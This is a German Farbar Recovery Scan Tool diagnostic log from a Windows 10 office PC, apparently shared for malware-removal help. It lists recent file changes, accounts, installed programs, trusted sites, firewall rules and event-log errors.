2021-01-10 01:38 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI

2021-01-10 01:38 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat

2021-01-10 01:38 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat

2021-01-10 01:38 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF

2021-01-10 00:59 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness

2021-01-10 00:58 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps

2021-01-10 00:41 - 2019-01-08 11:16 - 000000000 ____D C:\Users\buskr5\AppData\LocalLow\Temp

2021-01-09 18:20 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\ITMueller\IntelGraphicsProfiles

2021-01-09 18:17 - 2018-12-19 09:09 - 000000000 ____D C:\01_Laufwerke

2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk

2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information

2021-01-09 15:19 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Packages

2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog

2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001

2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\ITMueller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\ITMueller\OneDrive

2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Adobe

2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\ITMueller\3D Objects

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk

2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages

2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp

2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp

2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx

2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner

2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office

2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002

2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive

2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder

2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
 

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
 

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log
 

==================== SigCheck ============================
 

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
 

==================== Ende von FRST.txt ========================

Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (10-01-2021 09:05:09)

Gestartet von C:\Users\buskr5\Downloads

Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)

Start-Modus: Normal

==========================================================
 
 

==================== Konten: =============================
 

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)

buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Administrator - Enabled) => C:\Users\buskr5

DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)

Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)

ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller

WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)
 

==================== Sicherheits-Center ========================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 

==================== Installierte Programme ======================
 

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
 

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)

ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)

Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)

Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)

DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden

HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)

HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)

HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)

HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)

iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)

KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden

MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)

Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)

Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)

Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )

Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)

Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )

Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)

Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)

Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )

Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden

Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)

Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden

Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden

TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)

Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden

Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)
 

Packages:

=========

HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [2021-01-09] (HP Inc.)

Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-06-02] (Microsoft Corporation)

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]

Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [2020-11-12] (Thumbmunkeys Ltd)
 

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei

ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
 

==================== Codecs (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)
 

==================== Verknüpfungen & WMI ========================
 

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
 

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll
 

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
 

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
 

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
 

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
 

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
 

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com
 

==================== Hosts Inhalt: =========================
 

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
 

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 

==================== Andere Bereiche ===========================
 

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg

DNS Servers: 192.168.10.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 ist aktiviert.
 

Network Binding:

=============

Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 

WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 
 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"

HKLM\...\StartupApproved\Run: => "RTHDVCPL"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"
 

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

FirewallRules: [TCP Query User{C2EE26C6-1278-4E5A-BF61-BAD4EF414A5C}C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe] => (Allow) C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [UDP Query User{AB4AE912-D613-46D5-961F-1E0D5181E7A6}C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe] => (Allow) C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{B7BB2403-2541-4A72-BEBB-42B2D4C0ED89}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

FirewallRules: [{0A0FE43E-0CC6-4D38-9113-8BEA5F960CD2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

FirewallRules: [{8A35891F-A73F-4FED-895A-19F1DA77B36C}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

FirewallRules: [{14E4935D-3566-46BB-8062-4AF2550D8D98}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
 

==================== Wiederherstellungspunkte =========================
 

21-12-2020 07:06:20 Geplanter Prüfpunkt

28-12-2020 10:50:36 Geplanter Prüfpunkt

06-01-2021 10:37:08 Geplanter Prüfpunkt

09-01-2021 15:44:13 Removed Eumex RNDIS64 Treiber V1.02.
 

==================== Fehlerhafte Geräte im Gerätemanager ============
 

Name: Shrew Soft Virtual Adapter

Description: Shrew Soft Virtual Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Shrew Soft

Service: vnet

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 

==================== Fehlereinträge in der Ereignisanzeige: ========================
 

Applikationsfehler:

==================

Error: (01/10/2021 12:41:33 AM) (Source: VSS) (EventID: 8193) (User: )

Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.

.
 

Error: (01/10/2021 12:41:33 AM) (Source: VSS) (EventID: 13) (User: )

Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.

]
 

Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)

Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
 

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b

Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000

Ausnahmecode: 0xc0000005

Fehleroffset: 0x03233f2e

ID des fehlerhaften Prozesses: 0x285c

Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba

Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Pfad des fehlerhaften Moduls: unknown

Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
 

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 4c0
 

Startzeit: 01d6df75472ad580
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 838
 

Startzeit: 01d6df7570957287
 

Beendigungszeit: 24
 

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
 

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2ddc
 

Startzeit: 01d6d2c180af7335
 

Beendigungszeit: 4294967295
 

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
 

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949
 

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe
 

Relative Anwendungs-ID des fehlerhaften Pakets: App
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 28f4
 

Startzeit: 01d6d2c07cb57be1
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 
 

Systemfehler:

=============

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/10/2021 01:32:40 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 
 

Windows Defender:

===================================

